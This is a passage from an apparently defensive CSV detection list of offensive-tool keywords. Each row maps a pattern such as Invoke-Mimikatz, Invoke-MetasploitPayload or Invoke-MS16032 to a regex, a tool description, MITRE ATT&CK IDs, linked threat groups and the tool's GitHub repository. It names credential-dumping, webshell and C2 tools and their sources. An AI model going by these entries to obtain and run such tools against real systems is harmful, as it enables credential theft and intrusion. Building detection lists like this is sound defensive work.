server","T1059.001 - T1102 - T1056 - T1071 - T1086 - T1123","TA0011 - TA0010 - TA0005 - TA0002 - TA0009 - TA0006","N/A","N/A","Credential Access","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","49171" "*Invoke-MDExclusionParser *",".{0,1000}Invoke\-MDExclusionParser\s.{0,1000}","offensive_tool_keyword","MDExclusionParser","PowerShell script to quickly scan Event Log ID 5007 and 1121 for published Windows Defender Exclusions and Attack Surface Reduction (ASR) rule configuration.","T1562.001","TA0005 - TA0007","N/A","N/A","Defense 
Evasion","https://github.com/ViziosDe/MDExclusionParser","1","0","N/A","N/A","5","1","6","1","2024-06-12T14:17:08Z","2024-06-12T11:56:07Z","49172" "*Invoke-Medusa *",".{0,1000}Invoke\-Medusa\s.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","49173" "*Invoke-Merlin.ps1*",".{0,1000}Invoke\-Merlin\.ps1.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","49174" "*Invoke-MetasploitPayload*",".{0,1000}Invoke\-MetasploitPayload.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - 
TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49175" "*Invoke-MetasploitPayload*",".{0,1000}Invoke\-MetasploitPayload.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","49176" "*Invoke-MetasploitPayload.ps1*",".{0,1000}Invoke\-MetasploitPayload\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - 
TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49177" "*Invoke-MetasploitPayload.ps1*",".{0,1000}Invoke\-MetasploitPayload\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","49178" "*Invoke-MetaTwin*",".{0,1000}Invoke\-MetaTwin.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. 
Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/threatexpress/metatwin","1","1","N/A","N/A","9","4","345","71","2024-11-19T19:45:59Z","2017-10-08T13:26:00Z","49179" "*InvokeMeter.bat*",".{0,1000}InvokeMeter\.bat.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","49180" "*Invoke-MFASweep*",".{0,1000}Invoke\-MFASweep.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","1","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","49181" "*Invoke-MFASweep*",".{0,1000}Invoke\-MFASweep.{0,1000}","offensive_tool_keyword","MFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003 - T1621","TA0006 - TA0009","N/A","N/A","Exploitation tool","https://github.com/dafthack/MFASweep","1","1","N/A","N/A","9","10","1484","203","2025-03-04T20:36:41Z","2020-09-22T16:25:03Z","49182" "*Invoke-MimiDoggies*",".{0,1000}Invoke\-MimiDoggies.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","49183" 
"*Invoke-Mimidogz*",".{0,1000}Invoke\-Mimidogz.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","49184" "*Invoke-Mimidogz.ps1*",".{0,1000}Invoke\-Mimidogz\.ps1.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","49185" "*Invoke-Mimikatz -Command *",".{0,1000}Invoke\-Mimikatz\s\-Command\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - 
HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49186" "*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","49187" "*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","N/A","10","1","62","14","2024-04-18T14:28:21Z","2020-09-22T16:47:19Z","49188" "*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - 
Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49189" "*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49190" "*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49191" "*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","49192" "*Invoke-Mimikatz*",".{0,1000}Invoke\-Mimikatz.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","49193" 
"*Invoke-Mimikatz.json*",".{0,1000}Invoke\-Mimikatz\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","49194" "*Invoke-Mimikatz.ps1*",".{0,1000}Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","49195" "*Invoke-Mimikatz.ps1*",".{0,1000}Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49196" "*Invoke-Mimikatz.ps1*",".{0,1000}Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","49197" 
"*Invoke-Mimikatz.ps1*",".{0,1000}Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","49198" "*Invoke-Mimikatz.ps1*",".{0,1000}Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","N/A","10","1","62","14","2024-04-18T14:28:21Z","2020-09-22T16:47:19Z","49199" 
"*Invoke-Mimikatz.ps1*",".{0,1000}Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","49200" "*Invoke-Mimikatz.ps1*",".{0,1000}Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","49201" "*Invoke-Mimikatz-old*",".{0,1000}Invoke\-Mimikatz\-old.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","49202" "*Invoke-MimikatzWDigestDowngrade*",".{0,1000}Invoke\-MimikatzWDigestDowngrade.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49203" "*Invoke-mimikittenz*",".{0,1000}Invoke\-mimikittenz.{0,1000}","offensive_tool_keyword","Dispossessor","credential scripts used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","49204" "*Invoke-Mimikittenz*",".{0,1000}Invoke\-Mimikittenz.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49205" "*Invoke-mimikittenz.ps1*",".{0,1000}Invoke\-mimikittenz\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","49206" "*Invoke-MITM6*",".{0,1000}Invoke\-MITM6.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into 
Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49207" "*Invoke-ModifiableProgramsCheck*",".{0,1000}Invoke\-ModifiableProgramsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49208" "*Invoke-Mongoose*",".{0,1000}Invoke\-Mongoose.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","49209" "*Invoke-MonitorCredSniper*",".{0,1000}Invoke\-MonitorCredSniper.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49210" "*Invoke-MS16*",".{0,1000}Invoke\-MS16.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49211" "*Invoke-MS16032*",".{0,1000}Invoke\-MS16032.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-MS16032.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49212" "*Invoke-MS16032.ps1*",".{0,1000}Invoke\-MS16032\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 